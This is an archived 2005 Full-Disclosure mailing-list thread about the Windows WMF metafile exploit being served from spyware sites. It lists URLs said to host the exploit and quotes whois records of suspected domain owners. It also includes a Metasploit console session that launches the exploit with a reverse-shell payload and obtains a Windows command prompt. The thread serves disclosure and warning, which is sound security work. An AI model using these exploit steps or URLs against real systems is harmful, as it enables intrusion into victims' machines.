lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <43B31157.7020909@heapoverflow.com>
Date: Wed Dec 28 22:28:00 2005
From: ad at heapoverflow.com (ad@...poverflow.com)
Subject: Someone wasted a nice bug on spyware...

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
I think you shouldnt be security specialist for putting crackz.ws in
your banned website list , hehehe , this is probably the most funny
warez site around there and I bet these loosers aren't knowing the
number of ie exploits they are hosting on there own domain lol...

Paul wrote:
> Indeed, this is quite an annoyance. Buytoolbar.biz/xpl.wmf also works. I
> sent it to Microsoft a few days ago and they're looking into it. It looks
> like it's going to be a bad week at MSRC :(
>
> I whoised the owners of a couple domains who host the image and got the
> following information:
>
> Domain Name:                                 BEEHAPPYY.BIZ
> Domain ID:                                   D9564716-BIZ
> Sponsoring Registrar:                        ONLINENIC, INC. D/B/A
> CHINA-CHANNEL.COM
> Sponsoring Registrar IANA ID:                82
> Domain Status:                               ok
> Registrant ID:                               OLNIC_919328_0_0
> Registrant Name:                             Mikhail Sergeevich Gorbachev
> Registrant Organization:                     Mikhail Sergeevich Gorbachev
> Registrant Address1:                         Krasnaya ploshad, 1
> Registrant City:                             Moscow
> Registrant State/Province:                   Moscow
> Registrant Postal Code:                      176098
> Registrant Country:                          Russian Federation
> Registrant Country Code:                     RU
> Registrant Phone Number:                     +7.0957643453
> Registrant Facsimile Number:                 +7.0957643453
> Registrant Email:                            mail@...lbox.temp
> Administrative Contact ID:                   OLNIC_919328_1_0
> Administrative Contact Name:                 Mikhail Sergeevich Gorbachev
> Administrative Contact Organization:         Mikhail Sergeevich Gorbachev
> Administrative Contact Address1:             Krasnaya ploshad, 1
> Administrative Contact City:                 Moscow
> Administrative Contact State/Province:       Moscow
> Administrative Contact Postal Code:          176098
> Administrative Contact Country:              Russian Federation
> Administrative Contact Country Code:         RU
> Administrative Contact Phone Number:         +7.0957643453
> Administrative Contact Facsimile Number:     +7.0957643453
> Administrative Contact Email:                mail@...lbox.temp
> Billing Contact ID:                          OLNIC_919328_3_0
> Billing Contact Name:                        Mikhail Sergeevich Gorbachev
> Billing Contact Organization:                Mikhail Sergeevich Gorbachev
> Billing Contact Address1:                    Krasnaya ploshad, 1
> Billing Contact City:                        Moscow
> Billing Contact State/Province:              Moscow
> Billing Contact Postal Code:                 176098
> Billing Contact Country:                     Russian Federation
> Billing Contact Country Code:                RU
> Billing Contact Phone Number:                +7.0957643453
> Billing Contact Facsimile Number:            +7.0957643453
> Billing Contact Email:                       mail@...lbox.temp
> Technical Contact ID:                        OLNIC_919328_2_0
> Technical Contact Name:                      Mikhail Sergeevich Gorbachev
> Technical Contact Organization:              Mikhail Sergeevich Gorbachev
> Technical Contact Address1:                  Krasnaya ploshad, 1
> Technical Contact City:                      Moscow
> Technical Contact State/Province:            Moscow
> Technical Contact Postal Code:               176098
> Technical Contact Country:                   Russian Federation
> Technical Contact Country Code:              RU
> Technical Contact Phone Number:              +7.0957643453
> Technical Contact Facsimile Number:          +7.0957643453
> Technical Contact Email:                     mail@...lbox.temp
> Name Server:                                 NS1.PERLINK.BIZ
> Name Server:                                 NS2.PERLINK.BIZ
> Created by Registrar:                        ONLINENIC, INC. D/B/A
> CHINA-CHANNEL.COM
> Last Updated by Registrar:                   ONLINENIC, INC. D/B/A
> CHINA-CHANNEL.COM
> Domain Registration Date:                    Tue Apr 26 15:43:16 GMT 2005
> Domain Expiration Date:                      Wed Apr 25 23:59:59 GMT 2007
> Domain Last Updated Date:                    Thu Aug 11 02:33:14 GMT 2005
>
>
> The name Mikhail Sergeevich Gorbachev that this domain is registered to
> leads me to believe that it is registered with false information (for those
> of you who don't know, Gorbachev was a former Soviet president).
>
>
> Domain Name:                                 BUYTOOLBAR.BIZ
> Domain ID:                                   D11475548-BIZ
> Sponsoring Registrar:                        TLDS INC.
> Sponsoring Registrar IANA ID:                320
> Domain Status:                               clientTransferProhibited
> Registrant ID:                               6464084-SRSPLUS
> Registrant Name:                             Ezhi Brozkevitsh
> Registrant Organization:                     Ezhi Brozkevitsh
> Registrant Address1:                         Al. Armii Ludowej 24
> Registrant City:                             Warszawa
> Registrant Postal Code:                      00-609
> Registrant Country:                          Poland
> Registrant Country Code:                     PL
> Registrant Phone Number:                     +21.225798400
> Registrant Email:                            admin@...traff.biz
> Administrative Contact ID:                   6464085-SRSPLUS
> Administrative Contact Name:                 Ezhi Brozkevitsh
> Administrative Contact Organization:         Ezhi Brozkevitsh
> Administrative Contact Address1:             Al. Armii Ludowej 24
> Administrative Contact City:                 Warszawa
> Administrative Contact Postal Code:          00-609
> Administrative Contact Country:              Poland
> Administrative Contact Country Code:         PL
> Administrative Contact Phone Number:         +21.225798400
> Administrative Contact Email:                admin@...traff.biz
> Billing Contact ID:                          6464085-SRSPLUS
> Billing Contact Name:                        Ezhi Brozkevitsh
> Billing Contact Organization:                Ezhi Brozkevitsh
> Billing Contact Address1:                    Al. Armii Ludowej 24
> Billing Contact City:                        Warszawa
> Billing Contact Postal Code:                 00-609
> Billing Contact Country:                     Poland
> Billing Contact Country Code:                PL
> Billing Contact Phone Number:                +21.225798400
> Billing Contact Email:                       admin@...traff.biz
> Technical Contact ID:                        6464086-SRSPLUS
> Technical Contact Name:                      Ezhi Brozkevitsh
> Technical Contact Organization:              Ezhi Brozkevitsh
> Technical Contact Address1:                  Al. Armii Ludowej 24
> Technical Contact City:                      Warszawa
> Technical Contact Postal Code:               00-609
> Technical Contact Country:                   Poland
> Technical Contact Country Code:              PL
> Technical Contact Phone Number:              +21.225798400
> Technical Contact Email:                     admin@...traff.biz
> Name Server:                                 NS1.BUYTOOLBAR.BIZ
> Name Server:                                 NS2.BUYTOOLBAR.BIZ
> Created by Registrar:                        TLDS INC.
> Last Updated by Registrar:                   TLDS INC.
> Domain Registration Date:                    Mon Nov 14 08:00:27 GMT 2005
> Domain Expiration Date:                      Mon Nov 13 23:59:59 GMT 2006
> Domain Last Updated Date:                    Mon Nov 14 11:16:52 GMT 2005
>
> This information does look promising. Iframeurl.biz is also registered to
> the same individual. Perhaps the Polish authorities could apprehend this
> culprit (either that, or a Polish reader of full-disclosure could pay him a
> visit ;). That is, of course, assuming he is stupid enough to use his real
> name to register a domain for illegal use.
>
>
> Regards,
> Paul
> Greyhats Security
> http://greyhatsecurity.org
>
>
>
>
> -----Original Message-----
> From: full-disclosure-bounces@...ts.grok.org.uk
> [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of Eric Sites
> Sent: Tuesday, December 27, 2005 11:02 PM
> To: full-disclosure@...ts.grok.org.uk
> Subject: RE: [Full-disclosure] Someone wasted a nice bug on spyware...
>
> We are seeing a lot of website picking this exploit up.
>
> Examples: DON'T CLICK
>
> Crackz.ws
> unionseek.com/d/t1/wmf_exp.htm
> beehappyy.biz/parthner3/xpl.wmf
> http://www.tfcco.com/xpl.wmf
> Iframeurl.biz
>
> Cheers,
>
> Eric Sites
> VP of Research & Development
> Sunbelt Software
>
> email: eric@...belt-software.com
> Voice: 1-727-562-0101 x 276
> Cell: 1-727-637-2414
> Fax: 1-727-562-5199
> Web: http://www.sunbelt-software.com
> Physical Address:
> 101 N Garden Ave,
> Suite 120
> Clearwater, FL, 33755
> United States
>
> -----Original Message-----
> From: full-disclosure-bounces@...ts.grok.org.uk
> [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of H D
> Moore
> Sent: Tuesday, December 27, 2005 10:57 PM
> To: full-disclosure@...ts.grok.org.uk
> Subject: [Full-disclosure] Someone wasted a nice bug on spyware...
>
> In reference to:
> http://www.securityfocus.com/archive/1/420288/30/0/threaded
>
> I ported the exploit to the Metasploit Framework in case anyone wants to
>
> test it without installing a thousand spyware apps...
>
> Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:
>
> --http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metaf
> ile
> --http://metasploit.com/tools/framework-2.5-snapshot.tar.gz
>
> Tested on Win XP SP1/SP2 and Windows 2003 SP0/SP1.
>
> -HD
>
> + -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]
>
> msf > use ie_xp_pfv_metafile
> msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
> PAYLOAD -> win32_reverse
> msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
> LHOST -> 192.168.0.2
> msf ie_xp_pfv_metafile(win32_reverse) > exploit
>
> [*] Starting Reverse Handler.
> [*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
> [*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
> [*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061
>
> Microsoft Windows XP [Version 5.1.2600]
> (C) Copyright 1985-2001 Microsoft Corp.
>
> C:\Documents and Settings\XXXX\Desktop> 
>
>
> On Tuesday 27 December 2005 14:20, noemailpls@...mail.ziper wrote:
>> Warning the following URL successfully exploited a fully patched
>> windows xp system with a freshly updated norton anti virus.
>>
>> unionseek.com/d/t1/wmf_exp.htm
>>
>> The url runs a .wmf and executes the virus, f-secure will pick up the
>> virus norton will not.
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ7MRVq+LRXunxpxfAQITRg//dSLUa67EmG/r0v+2/rN6QxmkrbdZ9oF9
2v089NF4Hc9Ms/BcH8u61ZHXXJ3Ht2nMNpbhucsxH58rT9pZyGNQzOFs1qBxsymn
/PHlIQPQuJrbLtODHDeTdnX+7WClRQdXkbysNzEEBJeFnvFlkNIHLMfizRqVKNS1
WRGftGKKGlvmQhVs9poIpYyUK5mirTU83L2sWQswFR6DcZj+yuvPnhpp4dRfsC2M
oMxwLMVe2eyZvtCZucdluVX6Z/jWfdC7ZTxzKyCrRlrkmmR6ItXP5HhVqq4hodhz
gG5KGx2Qa4DJS1kMw6mXMhg2OoWhaHEDHOv7S5XKINlPHaQzv/HxAssOdjjShxVZ
ZvmozA7odlWmSvlz6SkJYNZjxBDvzFvIg86SMXe/s3mh3zZuBbxVyQ9vEw0v8JA1
/500hCIQ2fM0jNzRbcYwFkzrWSTL/vWBTes3q6s4YLNx/XQfMZE+YSgFYcuGEqh1
0lDeNzu/J8E2mnfJLLe0qMMeRzXvZOIe4cU3kYHINzSl0XiSdwNylrKSVyIuWYc4
7eD41YD3LQIjhL+nWYG8pSdsyceQLrUO0+s0L5mQCkTFRpzJp5mag0DnU4IugfyI
wLSe3jesj3VOhQeeVgB4ZPdxrh3ukmqumJVKZhgdE4uVgsSuiNvWCyYigM0TCC18
TID7YC6EZD8=
=SY6l
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ